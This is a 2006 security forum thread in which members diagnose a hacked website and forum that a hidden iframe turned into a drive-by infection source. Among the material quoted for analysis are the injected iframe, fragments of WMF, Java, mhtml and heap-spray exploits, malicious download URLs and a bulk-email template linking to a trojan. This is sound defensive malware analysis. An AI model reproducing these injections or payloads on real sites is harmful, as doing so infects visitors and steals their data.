website and forum virus - help please !!

Discussion in 'malware problems & news' started by davlam, Feb 25, 2006.

Thread Status:
Not open for further replies.
  1. davlam

    davlam Registered Member

    Joined:
    Sep 20, 2004
    Posts:
    11
    Hi,

    my mate has a website and forum.

    whenever i go to my m8's site or forum home using IE (firefox does not exhibit this) bit defender goes nuts finding three virus elements

    Exploit.Win32.WMF -PFV
    Exploit.IECrashJS2.Gen
    Exploit.Onload.A

    other members running avg and panda get the same alerts (only IE not FF)

    It seems to stem(we think) from this line which is appearing in the html of many pages on his site and forum.


    Code:
    <body>
    <iframe src="http://traffdollars.biz/dl/adv553.php" width=1 height=1></iframe>

    he removes this line from the page html and there are no more alerts.

    2ndly. after a period of time this code reappears in the html of the pages he has 'cleaned'. He has even downloaded his complete site and ran a virus check, fixed everything and reuploaded. Then after a period it's back again.

    He has taken the site down but the disabled login to the forum is still there if you want to try it. Use ie but make sure your antivirus is up to it. Use IE. The min the page loads your AV will go nuts.

    I thought this might have been down to the vmf vulnerability that ms patched in jan but the servers of his host are linux.

    sorry for not explaining very well but we are now completely stumped.

    It may well be a server/host issue but it will be monday before he can contact them again.

    There was a suggestion that the route into his account was via the forum but i think that was a guess with no basis of fact or the host finding anything. IPB say update to the latest version but they would say that anyway.

    can anyone help ..

    cheers,

    ps oh yea the link to the forum as you won't get the homepage to his site. I told him to create a basic temporary one that was clean and we'd see if it got hacked so there is one there in the root with just text links.

    Code:
    http://www.stbees.org.uk/sbforum
     
    Last edited: Feb 25, 2006
  2. TNT

    TNT Registered Member

    Joined:
    Sep 4, 2005
    Posts:
    948
    Sorry, I think there is something really, badly wrong with your friend's server. Something has been clearly compromised; hxxp://traffdollars.biz/dl/adv553.php is part of an exploit/spyware gang and it's possible that they hacked their way into the server to plant these exploits. This has nothing to do with the fact that the server runs on Linux: these are exploits targeted at the visitors (as to compromise their machines), but it looks like something on the server was hacked in the first place.
     
    Last edited by a moderator: Feb 26, 2006
  3. davlam

    davlam Registered Member

    Joined:
    Sep 20, 2004
    Posts:
    11
    many thanks for the reply..

    after initial investigation my feeling was that it was the server and not host site but his host was not supporting that theory so we had to look at other possible solutions.

    And some info i fond pointed to the wmf vulnerability but i suppose as you say that's at the recipient end and not the carrier (host/server).

    Thanks i'll feed that back...

    so pressure moves to his host..

    cheers
     
    Last edited: Feb 25, 2006
  4. Bubba

    Bubba Updates Team

    Joined:
    Apr 15, 2002
    Posts:
    11,271
    Very much so....

    AntiVir Found Exploit/MS06-001.WMF exploit
    ArcaVir Found Trojan.Downloader.Agent.Acd
    Avast Found MS06-001 WMF Exploit
    AVG Antivirus Found nothing
    BitDefender Found Exploit.Win32.WMF-PFV
    ClamAV Found Exploit.WMF.A
    Dr.Web Found Exploit.MS05-053
    F-Prot Antivirus Found exploit named CVE-2005-4560
    Fortinet Found nothing
    Kaspersky Anti-Virus Found Trojan-Downloader.Win32.Agent.acd
    NOD32 Found a variant of Win32/Exploit.WMF
    Norman Virus Control Found W32/Exploit.Gen
    UNA Found Exploit.WMF.Agent
    VBA32 Found Exploit.WMF

    Code:
    Cascading Style Sheet(CSS 467), for Invision Power Board 2.0.0
    Author: James A. Mathias, admin [I]at[/I] leihu.com, http://www.1lotus.com 
    Copyright: 2004 Invision Power Services, all rights reserved
    1lotus is a Web Development and Design....wonder if they figure into the problem ?
     
  5. TNT

    TNT Registered Member

    Joined:
    Sep 4, 2005
    Posts:
    948
    Interesting is the fact that the traffdollars.biz page "sniffs" the user-agent string, server-side: I did not see anything on the exploit page in Firefox (just an empty page) and was not able to download anything with wget, but using the --user-agent="Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" in wget did download the non-empty exploit page. There are various nasties in there:

    - the well known wmf exploit (http://www.microsoft.com/technet/security/advisory/912840.mspx)

    - a javascript "fill memory" exploit (http://www.microsoft.com/technet/security/advisory/911302.mspx)

    - mhtml exploit (http://www.f-secure.com/v-descs/exp_mht.shtml)

    - Trojan-Downloader.Java.OpenStream.c, Trojan.Java.ClassLoader.h, Trojan.Java.ClassLoader.d, all in loaderadv553.jar (Exploit.ByteVerify)

    - Trojan-Downloader.Java.OpenConnection.aj (Exploit.ByteVerify) in java.jar

    - Trojan-Downloader.Win32.Small.ckj (loaderadv553.exe, x.chm), this one was not recognized by Ewido, I just sent the sample to them.


    No new exploits, but still a load of crap. This stinks like Coolwebsearch.
     
    Last edited: Feb 26, 2006
  6. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    3,943
    Location:
    California
    And how.

    Opera brings up a redirect page but nothing happens.

    p692698-1-traffd_opera.gif
    _________________________________________________

    Using IE:

    p692698-2-traffd_redirect.gif
    _________________________________________________

    Looking up IP address for domain: traffdollars.biz
    The IP address for the domain is: 85.249.23.119

    Looking up the domain name for IP: 85.249.23.119
    The domain name for the IP address is: sr-customers-23-119.justdns.org
    ________________________________________________

    The main page had the four exploits you mentioned (some code removed):

    1) java exploit

    applet archive="java.jar" [removed] value="http://traffweb.biz/dl/loaderadv799.exe

    p692698-3-traffd_jar.gif

    p692698-4-traffd_java.gif
    _________________________________________________

    loaderadv799.exe did not attempt to download, so this exploit didn't work here.


    2) wmf exploit

    <iframe src="xpladv799.wmf" width=1 height=1></iframe>

    The wmf file was cached here on Win2k without any download prompt but didn't do anything,
    since wmf is not associated with any program here:

    p692698-5-traffd_wmfdl.gif
    _________________________________________________

    p692698-6-traffd_wmfcache2.gif
    _________________________________________________

    3) javascript "fill memory" exploit

    iframe width=1 height=1 border=0 frameborder=0 src=fillmemadv799.htm iframe

    script Language="JavaScript"
    .....

    mem = mem + unescape
    ("⑴廴쀫⯿"+
    "惠诠⯽臉壩"+
    "⮤ⷀᅭ?씃"+
    "줫ﻧ?玁ꥄ䩧菍"+
    "ﳫ畁쵈퟿枪䁊"+
    "켔쵎辩켥枩佅星쵊"+
    "⟃촢枙ꕊ报쵊柃墵"+
    .....

    p692698-7-traffd_fillmem.gif
    ____________________________________________


    4) mhtml exploit - using a fake .chm file to download the trojan:

    SCRIPT LANGUAGE="JavaScript"
    [removed]
    obj = "<object data=\"ms-its:mhtml:file";
    hxxp: / / traffweb.biz/dl/adv799/x.chm::/load.exe


    p692698-8-traffd_chmcache.gif
    _________________________________________________

    p692698-9-traffd_chmscan.gif
    _________________________________________________

    load.exe attempts to download. This was the only one of the exploits
    that attempted a download:

    p692698-10-traffd_downloader2m.gif
    _________________________________________________

    There was a log file cached which had this entry, showing the abortion of the download:

    LOG: Reporting Code Download Completion: (hr:80004004 (FAILED), CLASSID: 11111111...,...x.chm::/load.exe)
    ______________________________________________


    ---
     
    Last edited: Feb 27, 2006
  7. TNT

    TNT Registered Member

    Joined:
    Sep 4, 2005
    Posts:
    948
  8. StevieO

    StevieO Registered Member

    Joined:
    Feb 2, 2006
    Posts:
    1,067
    I went to stbees.org.uk/sbforum and got an ActiveX alert, and at the same time i got a file DL prompt for the xpladv553.wmf exploit from traffdollars.biz and Bitdefender jumped in to block it.

    so-1-stbees12tf.png

    I must be lucky lol, because straight after cancelling the above attempts, i got a further NINE, yes count them, attempted DL's of different variations. As soon as i cancelled one the next popped up, right through all nine.

    so-2-stbees25ux.png

    I've never had so many all at once like that, quite an experience, but still secure after the events !

    davlam i hope that you and your friend manage to fix soon !


    StevieO
     
  9. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    3,943
    Location:
    California
    I hope so too! BTW - that's quite a Christmas tree display of download attempts you had!

    There was another attempt to connect out that I didn't allow at the time. The site is back up so I decided to see what happens:

    p692897-1-traffd_ms1.gif

    Turns out to be Microsoft:

    NetRange: 207.46.0.0 - 207.46.255.255
    NetName: MICROSOFT-GLOBAL-NET

    Allowing it to connect, it attempts to download a dll:

    p692897-2-traffd_ms3.gif

    This line is in one of the html files:

    hrResponseHdr: 0, URL: (hxxp: //activex.microsoft.com/objects/ocget.dll)

    A search for this dll found a reference to it being used to bypass pop-up blockers:

    http://blogs.securiteam.com/index.php/archives/138#comment-697

    And so it goes....

    ----
     
  10. TNT

    TNT Registered Member

    Joined:
    Sep 4, 2005
    Posts:
    948
    They're part of the same exploit loaded nine times (the iframes in lines 6-14). I've seen this exploit also on ~snip....removed link per TOS~ (don't go there).

    It's the one that opens the prompt window shown by Rmus (the one on the top):

    p692911-1-traffd_downloader.gif
     

    Attached Files:

    Last edited by a moderator: Feb 27, 2006
  11. davlam

    davlam Registered Member

    Joined:
    Sep 20, 2004
    Posts:
    11
    wow !!

    thanks guys,

    i'm just back from a day out and am going to check with the site owner now as to what the progress is..

    back soon.

    thanks very much :thumb:
     
  12. davlam

    davlam Registered Member

    Joined:
    Sep 20, 2004
    Posts:
    11
    My m8 has forwarded our combined comments to his host and they are following it up. The main initial action is to secure the site, clean it and relocate it to a secure pro hosting package.(though why a normal hosting package should be less secure i don't know).
    As far as the source of the hack, this is still under investigation.
    There is still a suggestion that the forum was the entry point, i am personally doubtful of that but i am no expert.
    In any case the forum is being upgraded to the latest IPB release.
    I will report back as and when I can.
     
  13. DrMac

    DrMac Registered Member

    Joined:
    Feb 26, 2006
    Posts:
    2
    My thanks to Davlam for his direct and very useful help and also to you guys for yours, even if I don't understand 3/4 of it! The 1/4 I did understand gave me nightmares, so perhaps just as well that was all I understood.

    Unfortunately, it doesn't look as if the American technicians believe you. (The people I deal with are UK based, but the servers are in America).
     
  14. StevieO

    StevieO Registered Member

    Joined:
    Feb 2, 2006
    Posts:
    1,067
    TNT

    Yes thanks for that ! I tried to go to ~snip....link removed per TOS~ but it wasn't up, so i tried a few of the other ones again that are similar. Not much real software etc to be had, but plenty of attempted DL's and exploits lol.

    davlam

    Great, keep us posted.


    StevieO
     
    Last edited by a moderator: Feb 27, 2006
  15. davlam

    davlam Registered Member

    Joined:
    Sep 20, 2004
    Posts:
    11
    in case you are wondering who the new member drmac is..he's the m8 who site we are discussing .. (in case you didn't guess)

    ps.

    what does anyone think about the 'way in' being through the forum as has been suggested to us.
     
  16. wng_z3r0

    wng_z3r0 Registered Member

    Joined:
    Feb 27, 2006
    Posts:
    1
    Hello. I don't know how you are being exploited this time. Just some info. A little while back, http://forums.amd.com was also hacked and an <iframe> was placed to link to toolbarbiz. The support team there said that the reason for the attack was an un-updated forum software

    So that may be the issue. Is your forum software completely up to date? Also, do you have raw server logs that you can look at? It may prove useful to pinpointing the attack vector.

    wng
     
  17. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    3,943
    Location:
    California
    Several articles have noted that a lot of current malware is combining exploits hoping, I suppose, to find users with at least one vulnerability. The e-card (postcards.com) I posted in another thread, had five exploits.

    One article mentioned at DSLR had this comment: ( http://www.securescience.net/advisories/SSC_MSAT_FEB_02_2006-public.pdf )

    "Examination of these files show that they lead to multiple exploits in an effort to force the user to download the A-311 Death backdoor (bugfix.exe)."


    With the traffdollars.biz site in question, the file that it wants to force the user to download is load.exe (aka loaderadv###.exe) which is the main workhorse. Once this file executes, it’s pretty much all over.

    Watching it run shows it to be a typical downloader trojan that connects out to download more trojans, that in turn connect out… etc. Here are a few:

    p693904-1-kerio.gif
    ______________________________________________

    Some files I archived:

    p693904-2-traffd.gif
    _______________________________________________

    All of the files had already been picked up by many AV. Some File Scans


    The obligatory Spyware Warning:

    p693904-3-spysh.gif
    _________________________________________________

    The above is the secure32.html page, shown in the scan to be the Trojan.SpySheriff.C. All of the "click here" links at the bottom connect the user to the spysheriff site:

    hxxp ://www.spy-sheriff.com/?advid=1 To protect from the Spyware - click here
    hxxp ://www.spy-sheriff.com/? To prevent information transmission - click here
    hxxp ://www.spy-sheriff.com/? To delete the history of your activity, click here
    _______________________________________________


    The wnlogow.sys and avload.dll files are especially interesting:

    p693904-4-wnlogow-scan.gif

    p693904-5-avload-scan2.gif

    http://products.antivir.de/en/threats/BDS_Haxdoor_GJ_3_details.html

    Registry

    The following registry keys are added in order to load the service after reboot:
    -[HKLM\SYSTEM\CurrentControlSet\Services\wnlogow]
    • ImagePath = \??\%SYSDIR%\wnlogow.sys


    Side effects:

    • Drops malicious files
    • Records keystrokes
    • Registry modification
    • Steals information
    • Third party control


    Rootkit Technology

    It is a malware-specific technology.
    •The malware hides its presence from system utilities, security applications
    and in the end, from the user.


    Hides the following:
    • Its own files


    Method used:
    • Hidden from Windows API

    ----------------

    http://www.hijackthis-forum.de/archive/index.php/t-14545.html

    This is from blacklight:
    02/21/06 16:54:54 [Info]: Hidden file: C:\WINDOWS\system32\avload32.dll
    02/21/06 16:54:55 [Info]: Hidden file: C:\WINDOWS\system32\wnlogow.sys

    This is from rootkitrevealer:
    C:\WINDOWS\system32\avload32.dll 2/20/2006 4:13 PM 12.31 KB Hidden from Windows API.
    C:\WINDOWS\system32\wnlogow.sys 2/20/2006 4:13 PM 5.36 KB Hidden from Windows API.
    ____________________________________________________________________


    TNT’s references to the documentation for these exploits at this site show there are patches for them.
    But there must be enough people out there who either have not patched, or have no other protection in place;
    otherwise, it would not be worthwhile for a site like this to continue to exist.
    That is to say, someone is making money.

    ----
     
    Last edited: Feb 28, 2006
  18. davlam

    davlam Registered Member

    Joined:
    Sep 20, 2004
    Posts:
    11
    just saying thanks again folks, this info is excellent and far beyond anything I could have come up with.

    boy am i glad i decided to post this in here..

    updates will follow.

    @ wng_z3r0 . i'll check with drmac and find out if the raw logs are available.
     
  19. Lollan

    Lollan Registered Member

    Joined:
    Feb 2, 2006
    Posts:
    288
  20. TNT

    TNT Registered Member

    Joined:
    Sep 4, 2005
    Posts:
    948
    It looks like traffdollars(dot)biz and traffweb(dot)biz have been taken down.

    EDIT: actually, no they are back up. :mad:
     
  21. davlam

    davlam Registered Member

    Joined:
    Sep 20, 2004
    Posts:
    11
    hi folks,

    well i have good news and bad..

    the good news is that drmacs site and forum are now up and running again. They have been completely virus checked and the forum upgraded to the latest IPB revision.

    The host has moved the site to another server. They call the account pro-hosting and it's on a completely different server than the standard hosting. By their own admission this pro-hosting server is much more secure than the other. Take what you like from that ....

    The bad news. Well it doesn't look like we are going to get to the bottom of the source. Or if it has been found then we are not being told about it. I hate not knowing the root cause but there is nothing we can do to find out what else has been done.

    So this is the end of the saga as far as we are concerned unless it rears it's head again.

    I'd just like to thank everyone for their help, it has been very informative and useful.

    Thanks again,

    cheers,

    dave
     
  22. StevieO

    StevieO Registered Member

    Joined:
    Feb 2, 2006
    Posts:
    1,067
    Hi davlam

    Great news ! Glad i was able to play a small part in all this.


    StevieO
     
  23. DrMac

    DrMac Registered Member

    Joined:
    Feb 26, 2006
    Posts:
    2
    Well I'm afraid I spoke to soon.

    Last week, all the files were uploaded to the new server.
    The forum was also uploaded and updated to the latest version (though I noted as soon as I logged in that there is another update available - I wonder if my experiences are anything to do with it!).

    Everything seemed OK for a couple of days but this morning when I logged in to the admin area I saw in the activity log that a bulk email had been created (but fortunately not sent).
    When I looked at and clicked on preview, my AV (Panda) got very excited and blocked or quarantined about a dozen viruses.

    The email that had been created was >>

    {member_name},
    <a href="http : //*** traffdollars.biz/dl/loadadv553.exe" target="_blank">please click</a>


    -------------------------------------
    {board_name} Statistics:
    -------------------------------------
    Registered Users: {reg_total}
    Total Posts: {total_posts}
    Busiest Time: {busy_count} users were online on {busy_time}

    -------------------------------------
    Handy Links
    -------------------------------------
    Board Address: {board_url}
    Log In: {board_url}?act=Login&CODE=00
    Lost Password Recovery: {board_url}?act=Reg&CODE=10

    -------------------------------------
    How to unsubscribe
    -------------------------------------
    Visit your email preferences ({board_url}?act=UserCP&CODE=02) and ensure that the box for 'Send me any updates sent by the board administrator' is unchecked and submit the form

    <<At this point was the IFrame line pointing to the traffdollars site again>>
     
  24. Nomadski

    Nomadski Registered Member

    Joined:
    Mar 12, 2006
    Posts:
    1
    Hey Guys,

    I'm afraid I have the same issue. Using IPB 2.0, I had all the latest patches installed, and just about to upgrade to 2.15

    Today my board got hacked, and an iframe with the traffdollars.biz link was added to all user prefixes, installed in several portal boxes, and so on.
    As if this is not worth enough, a bulk mail with an iframe and a link to an .exe file has been sent out to almost 2.000 Users. Clever enough, the hackers did not mail to any moderators or admins. The account that was used for the intrusion has been my tech admin's account.

    Now, if I read that the same happened again, I'm worrying about what's next...

    I changed all passwords and shut down the board for now.

    Any suggestions what could have happened?

    Thanks!
     
Loading...
Thread Status:
Not open for further replies.